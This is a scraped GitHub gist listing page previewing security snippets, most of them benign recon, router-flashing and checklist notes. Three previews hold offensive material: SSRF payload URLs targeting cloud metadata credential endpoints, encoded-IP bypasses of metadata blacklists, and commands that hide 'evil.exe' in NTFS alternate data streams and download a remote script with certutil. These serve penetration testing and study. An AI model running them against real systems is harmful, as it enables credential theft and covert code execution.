Skip to content

Instantly share code, notes, and snippets.

View ResistanceIsUseless's full-sized avatar
:shipit:
trying to switch timelines

StaticBunny ResistanceIsUseless

:shipit:
trying to switch timelines
View GitHub Profile
@xsuperbug
xsuperbug / reconme.txt
Created May 29, 2018 21:34 — forked from rootxharsh/reconme.txt
Aquatone and gowitness
###
If you use kali or any distro over SSH (like Droplet or VM with no GUI), You might have noticed aquatone does require xorg.
This few lines will help you create a report of domains with response headers and screenshots using gowitness.
Gowitness : https://github.com/sensepost/gowitness
Aquatone : https://github.com/michenriksen/aquatone
> Setup Kali Linux Hyper-V OR Ubuntu droplet
> Set VM/Droplet to Apache on boot. (Also SSH if it's VM)
> Set VM to start on host boot
@rootxharsh
rootxharsh / reconme.txt
Last active February 27, 2020 16:27
Aquatone and gowitness
alias reconme='function frecon()
{
mkdir $1
$HOME/./gowitness --chrome-path=/usr/bin/google-chrome file --source=$HOME/aquatone/$1/urls.txt -d $1/ -$
$HOME/./gowitness --chrome-path=/usr/bin/google-chrome -D /var/www/html/recon/$1/.gowitness-$1.db gene$
mv report.html $1/report-$1.html
sed -i -e 's%var\/www\/html\/%%g' $1/report-$1.html
chown -R www-data:www-data /var/www/html/recon
touch /var/www/html/recon/$1/index.html
@grantstephens
grantstephens / Flashing OpenWRT.md
Last active November 5, 2023 10:21
TP-Link TL-WR902AC v3 OpenWRT Setup

Important Links:

Flash instruction:

The only way to flash LEDE image in TL-WR902AC v3 is to use tftp recovery mode in U-Boot:

  1. Configure PC with static IP 192.168.0.66/24 and tftp server.
  2. Rename "openwrt-ramips-mt76x8-tplink_tl-wr902ac-v3-squashfs-tftp-recovery.bin" to "tp_recovery.bin" and place it in tftp server directory.
@jhaddix
jhaddix / content_discovery_all.txt
Created May 26, 2018 11:51
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
`
~/
~
ים
___
__
_
@7MinSec
7MinSec / Password_cracking_in_the_cloud.md
Last active February 20, 2025 03:19
Password cracking in the cloud
@ionicpanda
ionicpanda / oscp.md
Created April 18, 2018 03:45
OSCP Notes
  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@jhaddix
jhaddix / cloud_metadata.txt
Last active April 24, 2025 20:06 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@jhaddix
jhaddix / Testing_Checklist.md
Last active April 21, 2025 11:01 — forked from amotmot/WAHH_Task_Checklist.md
Fast Simple Appsec Testing Checklist
@danielpops
danielpops / example_output.txt
Created February 24, 2018 01:04 — forked from coffeetocode/example_output.txt
Example of bypasses for naive blacklists of 169.254.169.254 local metadata service. See https://twitter.com/coffeetocode/status/912788650408026112
$ ./try_local_metadata.sh
Trying 169.254.169.254... found metadata
Trying 169.254.43518... -
Trying 169.1668966... -
Trying 2852039166... found metadata
Trying 0251.0376.0251.0376... found metadata
Trying 0251.0376.0124776... -
Trying 251.0775248... -
Trying 25177524776... -
Trying 0xa9.0xfe.0xa9.0xfe... found metadata
@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active April 23, 2025 13:02
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab